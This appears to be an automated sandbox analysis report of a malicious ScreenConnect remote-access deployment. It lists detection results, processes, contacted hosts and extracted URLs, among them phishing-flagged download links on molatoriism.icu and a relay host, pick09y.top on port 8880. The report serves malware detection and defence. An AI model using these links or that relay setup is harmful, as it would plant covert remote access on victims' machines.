ScreenConnect.WindowsClient.exe 19 11 19->30         started        42 C:\ProgramData\Microsoft\...\Report.wer, Unicode 23->42 dropped 70 Contains functionality to hide user accounts 25->70 file9 signatures10 process11 signatures12 76 Contains functionality to hide user accounts 30->76 33 ScreenConnect.ClientService.exe 30->33         started        process13 signatures14 58 Contains functionality to hide user accounts 33->58 60 Enables network access during safeboot for specific services 33->60

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.Client.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.ClientService.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.ClientService.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.Core.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.Windows.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.WindowsClient.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\6CYAXCPV.WAA\JPKE5BKZ.YBG\ScreenConnect.WindowsFileManager.exe0%ReversingLabs
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  https://molatoriism.icu/Bin/ScreenConnect.WindowsFileManager.exe100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.Wind100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.Client.applicationplicat100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.Client.application01b100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.WindowsClient.exe.config100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.WindowsFileManager.exe.config0j100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.Core.dll100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.Client.applicationUZ100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.WindowsBackstageShell.exeR61fR100%Avira URL Cloudphishing
                  http://www.w3.(0%Avira URL Cloudsafe
                  https://molatoriism.icu/Bin/ScreenConnect.Client.100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.Client.application04l100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.Client.applicationS100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.Client.applicationX100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.WindowsClient.exe100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.WindowsClient.exe6fffi100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.Client.applicationxU100%Avira URL Cloudphishing
                  https://login.ecur0%Avira URL Cloudsafe
                  https://molatoriism.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.configRi100%Avira URL Cloudphishing
                  https://molatoriism.icu100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.Client.applicationt100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.Client.application089100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=pick09y.top&p=8880&100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.Client.application08904l100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.Client.application17100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.ClientService.exe100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.WindowsFileManager.exel7100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.application100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.Core.dllF100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.Client.application04100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.Client.dll100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.Windows.dll100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.WindowsFileManager.exeL6#f4100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.ClientSe100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.Client.applicationZ.L04re=100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.ClientService.exeP100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.WindowsBackstageShell.exe100%Avira URL Cloudphishing
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  pick09y.top
                  62.182.85.100
                  truefalse
                    unknown
                    s-part-0017.t-0009.fb-t-msedge.net
                    13.107.253.45
                    truefalse
                      high
                      molatoriism.icu
                      104.21.96.148
                      truefalse
                        unknown
                        fp2e7a.wpc.phicdn.net
                        192.229.221.95
                        truefalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://molatoriism.icu/Bin/ScreenConnect.WindowsFileManager.exefalse
                          • Avira URL Cloud: phishing
                          unknown
                          https://molatoriism.icu/Bin/ScreenConnect.Core.dllfalse
                          • Avira URL Cloud: phishing
                          unknown
                          https://molatoriism.icu/Bin/ScreenConnect.WindowsClient.exe.configfalse
                          • Avira URL Cloud: phishing
                          unknown
                          https://molatoriism.icu/Bin/ScreenConnect.WindowsClient.exefalse
                          • Avira URL Cloud: phishing
                          unknown
                          https://molatoriism.icu/Bin/ScreenConnect.ClientService.exefalse
                          • Avira URL Cloud: phishing
                          unknown
                          https://molatoriism.icu/Bin/ScreenConnect.Client.dllfalse
                          • Avira URL Cloud: phishing
                          unknown
                          https://molatoriism.icu/Bin/ScreenConnect.Windows.dllfalse
                          • Avira URL Cloud: phishing
                          unknown
                          https://molatoriism.icu/Bin/ScreenConnect.WindowsBackstageShell.exefalse
                          • Avira URL Cloud: phishing
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAABppHKnfHsvchost.exe, 00000008.00000003.1413529999.000002001D955000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://molatoriism.icu/Bin/ScreenConnect.Winddfsvc.exe, 00000001.00000002.2234906229.000001674E671000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: phishing
                            unknown
                            https://login.microsoftonline.com/ppsecure/ResolveUser.srfsvchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://molatoriism.icu/Bin/ScreenConnect.Client.applicationplicatdfsvc.exe, 00000001.00000002.2245474961.0000016768772000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: phishing
                              unknown
                              https://molatoriism.icu/Bin/ScreenConnect.WindowsBackstageShell.exeR61fRdfsvc.exe, 00000001.00000002.2245474961.0000016768772000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: phishing
                              unknown
                              https://molatoriism.icu/Bin/ScreenConnect.dfsvc.exe, 00000001.00000002.2234906229.000001674E350000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: phishing
                              unknown
                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAsvchost.exe, 00000008.00000002.2595165848.000002001D900000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://molatoriism.icu/Bin/ScreenConnect.Client.applicationUZScreenConnect.WindowsClient.exe, 0000000A.00000002.1766714940.0000000000FB0000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: phishing
                                unknown
                                https://molatoriism.icu/Bin/ScreenConnect.WindowsFileManager.exe.config0jdfsvc.exe, 00000001.00000002.2245232290.000001676872D000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: phishing
                                unknown
                                http://schemas.xmlsoap.org/ws/2004/09/policycsvchost.exe, 00000008.00000002.2595293916.000002001D95F000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://molatoriism.icu/Bin/ScreenConnect.Client.application01bdfsvc.exe, 00000001.00000002.2245474961.0000016768772000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: phishing
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issuesvchost.exe, 00000008.00000002.2595293916.000002001D96D000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdencesvchost.exe, 00000008.00000003.1413529999.000002001D955000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAAsvchost.exe, 00000008.00000003.1398602624.000002001D929000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://login.microsoftonline.com/ppsecure/devicechangecredential.srfsvchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf.svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://login.microsoftonline.com/ppsecure/EnumerateDevices.srfsvchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdecurisvchost.exe, 00000008.00000003.1398478634.000002001D95D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1398123474.000002001D956000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://account.live.com/InlineSignup.aspx?iww=1&id=80502svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namedfsvc.exe, 00000001.00000002.2234906229.000001674DF41000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.2597190273.0000000001D62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200svchost.exe, 00000008.00000003.1398428930.000002001D953000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdUsvchost.exe, 00000008.00000002.2595233523.000002001D937000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://Passport.NET/tb_svchost.exe, 00000008.00000002.2594733951.000002001D081000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsddsvchost.exe, 00000008.00000002.2595165848.000002001D900000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://molatoriism.icu/Bin/ScreenConnect.Client.ScreenConnect.WindowsClient.exe, 0000000A.00000002.1766714940.0000000000F2D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: phishing
                                                            unknown
                                                            http://www.w3.(svchost.exe, 00000008.00000003.1398123474.000002001D956000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://molatoriism.icu/Bin/ScreenConnect.Client.application04ldfsvc.exe, 00000001.00000002.2244765941.00000167686C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: phishing
                                                            unknown
                                                            https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfJsvchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://account.live.com/msangcwamsvchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364059093.000002001D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364184917.000002001D952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2595233523.000002001D937000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364350500.000002001D957000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.w3.ordfsvc.exe, 00000001.00000002.2234906229.000001674E26B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E56B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E603000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://crl.ver)svchost.exe, 00000007.00000002.2596891843.000002EA7E60F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594952683.000002001D0D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://passport.net/tbsvchost.exe, 00000008.00000002.2595421751.000002001DE1C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594733951.000002001D081000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://molatoriism.icu/Bin/ScreenConnect.Client.applicationSdfsvc.exe, 00000001.00000002.2245474961.0000016768772000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: phishing
                                                                      unknown
                                                                      https://molatoriism.icu/Bin/ScreenConnect.Client.applicationXScreenConnect.WindowsClient.exe, 0000000A.00000002.1768380030.0000000002C8F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: phishing
                                                                      unknown
                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAAAsvchost.exe, 00000008.00000003.1413529999.000002001D955000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdxmlsvchost.exe, 00000008.00000002.2595233523.000002001D937000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://molatoriism.icu/Bin/ScreenConnect.Client.applicationxUdfsvc.exe, 00000001.00000002.2245474961.0000016768772000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: phishing
                                                                          unknown
                                                                          https://g.live.com/odclientsettings/Prod-C:edb.log.7.drfalse
                                                                            high
                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuesvchost.exe, 00000008.00000002.2595293916.000002001D96D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594952683.000002001D0D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://schemas.xmlsoap.org/ws/2005/02/trustncesvchost.exe, 00000008.00000002.2595233523.000002001D937000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://molatoriism.icu/Bin/ScreenConnect.WindowsClient.exe6fffidfsvc.exe, 00000001.00000002.2245876378.0000016768820000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: phishing
                                                                                unknown
                                                                                https://login.ecursvchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://molatoriism.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.configRidfsvc.exe, 00000001.00000002.2245232290.000001676872D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: phishing
                                                                                unknown
                                                                                https://molatoriism.icu/Bin/ScreenConnect.Client.applicationtdfsvc.exe, 00000001.00000002.2244765941.00000167686C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: phishing
                                                                                unknown
                                                                                https://molatoriism.icu/Bin/ScreenConnect.Client.applicationxdfsvc.exe, 00000001.00000002.2234906229.000001674E2A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://molatoriism.icudfsvc.exe, 00000001.00000002.2234906229.000001674E443000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E350000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E671000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E193000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: phishing
                                                                                  unknown
                                                                                  http://schemas.xmlsoap.org/ws/2005/02/scrfsvchost.exe, 00000008.00000002.2595293916.000002001D95F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://molatoriism.icu/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.applicationScreenConnect.WindowsClient.exe, 0000000A.00000002.1768380030.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1766714940.0000000000FFB000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1769216227.000000001B610000.00000004.00000020.00020000.00000000.sdmp, AI54ZOIT.log.1.drfalse
                                                                                    • Avira URL Cloud: phishing
                                                                                    unknown
                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdhemasvchost.exe, 00000008.00000002.2595233523.000002001D937000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://schemas.xmlsoap.org/ws/2004/09/policy=80601svchost.exe, 00000008.00000002.2595293916.000002001D96D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf:CLSIDsvchost.exe, 00000008.00000003.1364145022.000002001D910000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfsvchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364145022.000002001D910000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdwsse:Ssvchost.exe, 00000008.00000003.1413529999.000002001D955000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://login.microsoftonline.com/ppsecure/DeviceQuery.srfsvchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://molatoriism.icu/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=pick09y.top&p=8880&AI54ZOIT.log.1.drfalse
                                                                                                • Avira URL Cloud: phishing
                                                                                                unknown
                                                                                                https://molatoriism.icu/Bin/ScreenConnect.Client.application089dfsvc.exe, 00000001.00000002.2244765941.00000167686C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: phishing
                                                                                                unknown
                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trustsvchost.exe, 00000008.00000002.2595293916.000002001D95F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://login.microsoftonline.com/MSARST2.srfsvchost.exe, 00000008.00000003.1364395235.000002001D963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364325039.000002001D93B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2594659403.000002001D05F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://Passport.NET/STSsvchost.exe, 00000008.00000002.2595293916.000002001D95F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2595293916.000002001D96D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://molatoriism.icu/Bin/ScreenConnect.Client.application17dfsvc.exe, 00000001.00000002.2245474961.0000016768772000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: phishing
                                                                                                      unknown
                                                                                                      https://molatoriism.icu/Bin/ScreenConnect.Client.application08904lScreenConnect.WindowsClient.exe, 0000000A.00000002.1767483141.0000000001005000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: phishing
                                                                                                      unknown
                                                                                                      https://login.microsoftonline.com/ppsecure/DeviceQuery.srf-svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf%svchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://www.xrml.org/schema/2001/11/xrml2coreSdfsvc.exe, 00000001.00000002.2234906229.000001674DFCD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://www.w3.odfsvc.exe, 00000001.00000002.2234906229.000001674E56B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E55B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://molatoriism.icu/Bin/ScreenConnect.Core.dllFdfsvc.exe, 00000001.00000002.2246395181.000001676A541000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: phishing
                                                                                                              unknown
                                                                                                              http://Passport.NET/tbsvchost.exe, 00000008.00000002.2594659403.000002001D072000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2595233523.000002001D937000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsvchost.exe, 00000008.00000003.1413529999.000002001D955000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsdsvchost.exe, 00000008.00000002.2595293916.000002001D96D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://login.microsoftonline.com/ppsecure/devicechangecredential.srfMMsvchost.exe, 00000008.00000003.1364469812.000002001D927000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsis-2svchost.exe, 00000008.00000002.2595233523.000002001D937000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://signup.live.com/signup.aspxsvchost.exe, 00000008.00000003.1364369605.000002001D940000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://molatoriism.icu/Bin/ScreenConnect.WindowsFileManager.exel7dfsvc.exe, 00000001.00000002.2245474961.0000016768772000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                          unknown
                                                                                                                          https://molatoriism.icu/Bin/ScreenConnect.Client.application04ScreenConnect.WindowsClient.exe, 0000000A.00000002.1767483141.0000000001005000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                          unknown
                                                                                                                          https://account.live.com/inlinesignup.aspx?iww=1&id=80601svchost.exe, 00000008.00000003.1364648785.000002001D956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364059093.000002001D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364184917.000002001D952000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://account.live.com/inlinesignup.aspx?iww=1&id=80600svchost.exe, 00000008.00000003.1364059093.000002001D929000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://account.live.com/inlinesignup.aspx?iww=1&id=80603svchost.exe, 00000008.00000003.1364059093.000002001D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364184917.000002001D952000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://molatoriism.icu/Bin/ScreenConnect.ClientSedfsvc.exe, 00000001.00000002.2234906229.000001674E671000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: phishing
                                                                                                                                unknown
                                                                                                                                https://molatoriism.icu/Bin/ScreenConnect.WindowsFileManager.exeL6#f4dfsvc.exe, 00000001.00000002.2245474961.0000016768772000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: phishing
                                                                                                                                unknown
                                                                                                                                http://schemas.xmlsoap.org/ws/2004/09/policysvchost.exe, 00000008.00000002.2595293916.000002001D95F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2595233523.000002001D937000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymoussvchost.exe, 00000008.00000002.2595233523.000002001D937000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAAAsvchost.exe, 00000008.00000003.1398602624.000002001D929000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
